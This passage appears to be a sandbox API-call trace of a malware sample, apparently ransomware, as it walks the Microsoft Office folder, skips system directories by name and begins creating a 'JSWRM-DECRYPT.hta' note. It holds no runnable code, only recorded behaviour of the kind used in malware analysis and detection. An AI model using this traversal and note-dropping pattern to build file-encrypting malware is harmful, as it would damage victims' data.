-1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="recovery") returned -1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="perflogs") returned -1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="documents and settings") returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="system volume information") returned -1 [0073.044] lstrcmpiW (lpString1="mfc140u.dll", lpString2="msocache") returned -1 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mfc140u.dll", lpUsedDefaultChar=0x0) returned 11 [0073.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0073.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mfc140u.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mfc140u.dll", lpUsedDefaultChar=0x0) returned 11 [0073.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0073.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0073.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0073.045] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1f5fb21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd244aa14, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2=".") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="..") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="...") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="windows") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="recovery") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="perflogs") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="documents and settings") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="system volume information") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp120.dll", lpString2="msocache") returned 1 [0073.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0073.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0073.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0073.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0073.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0073.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0073.045] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1ea0ff2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1ea0ff2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd20449b3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2=".") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="..") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="...") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="windows") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="recovery") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="perflogs") returned -1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="documents and settings") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.045] lstrcmpiW (lpString1="msvcp140.dll", lpString2="system volume information") returned -1 [0073.046] lstrcmpiW (lpString1="msvcp140.dll", lpString2="msocache") returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0073.046] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e7acf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e7acf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1fac086, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2=".") returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="..") returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="...") returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="windows") returned -1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="recovery") returned -1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="perflogs") returned -1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="documents and settings") returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="system volume information") returned -1 [0073.046] lstrcmpiW (lpString1="msvcr120.dll", lpString2="msocache") returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0073.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0073.046] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e2e85a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e2e85a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f5fb21, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0073.046] lstrcmpiW (lpString1="ucrtbase.dll", lpString2=".") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="..") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="...") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="windows") returned -1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="recovery") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="perflogs") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="documents and settings") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="system volume information") returned 1 [0073.047] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="msocache") returned 1 [0073.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0073.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0073.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0073.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0073.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0073.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0073.047] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2f0533c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0073.047] lstrcmpiW (lpString1="vccorlib140.dll", lpString2=".") returned 1 [0073.047] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="..") returned 1 [0073.143] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="...") returned 1 [0073.143] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="windows") returned -1 [0073.143] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="recovery") returned 1 [0073.143] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="perflogs") returned 1 [0073.143] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="documents and settings") returned 1 [0073.144] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.144] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="system volume information") returned 1 [0073.144] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="msocache") returned 1 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0073.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0073.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0073.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0073.144] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2424784, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2424784, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26acf16, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2=".") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="..") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="...") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="windows") returned -1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="recovery") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="perflogs") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="documents and settings") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="system volume information") returned 1 [0073.144] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="msocache") returned 1 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x241038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0073.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0073.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.145] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2424784, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2424784, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26acf16, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0073.145] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0073.145] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2=".") returned 1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="..") returned 1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="...") returned 1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="windows") returned -1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="recovery") returned -1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="perflogs") returned -1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="documents and settings") returned -1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="$RECYCLE.BIN") returned 1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="system volume information") returned -1 [0073.145] lstrcmpiW (lpString1="CLIPART", lpString2="msocache") returned -1 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0073.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0073.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0073.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0073.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\jswrm-decrypt.hta")) returned 0xffffffff [0073.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0073.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0073.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0073.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0073.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0073.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0073.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0073.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft 